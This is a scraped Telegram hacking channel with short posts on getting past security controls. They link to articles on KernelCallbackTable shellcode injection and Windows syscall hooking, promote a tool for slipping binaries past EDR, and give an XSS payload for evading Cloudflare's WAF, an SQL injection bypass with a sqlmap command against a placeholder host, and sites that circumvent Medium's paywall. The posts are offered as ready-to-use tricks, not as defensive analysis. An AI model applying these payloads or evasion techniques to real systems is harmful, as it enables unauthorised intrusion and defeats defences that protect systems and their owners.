CrackCodes 🇮🇳
10K subscribers
1.39K photos
267 videos
712 files
3.47K links
Official website: https://crackcodes.in | https://system32.ink | https://system32.in

Admins: @MynK0x00
https://clavin.org/
@MCracker2002


Be Secure~
जय श्री राम
Download Telegram
Forwarded from 卩ro 爪Cracker
KernelCallbackTable Injection

KernelCallbackTable which could be abused to inject shellcode in a remote process. This method of process injection was used by FinFisher/FinSpy and Lazarus.

https://captmeelo.com/redteam/maldev/2022/04/21/kernelcallbacktable-injection.html

#edr #bypass #injection #cpp #maldev
На Source Zero Con 2022 представили данный инструмент. Если кратко: кидаете скомпилированный бинарь, тулза из бинаря убирает известные IoC строки, подписывает сертом из другого бинаря, ну и помогает EDR обходить (за счёт увеличения размера файла)

https://github.com/optiv/Mangle

#redteam #pentest #bypass
Forwarded from ㅤㅤㅤ
#windows #system call #bypass

Interception of system calls in Windows 11 22 H2 like Avast antivirus.

Research, analysis and bypass:
https://the-deniss.github.io/posts/2022/12/08/hooking-system-calls-in-windows-11-22h2-like-avast-antivirus.html
bypass XSS Cloudflare WAF

Encoded Payload
"><track/onerror='confirm\%601\%60'>

Clean Payload
"><track/onerror='confirm`1`'>

#CF #bypass
This media is not supported in your browser
VIEW IN TELEGRAM
🖼️ Bypass Medium Paywall

A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:

🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/

#medium #premium #bypass
Bypassing SQL
*
payload:
8%20or%207250%3d0725
*
для sqlmap:
sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast
*

#sql #bypass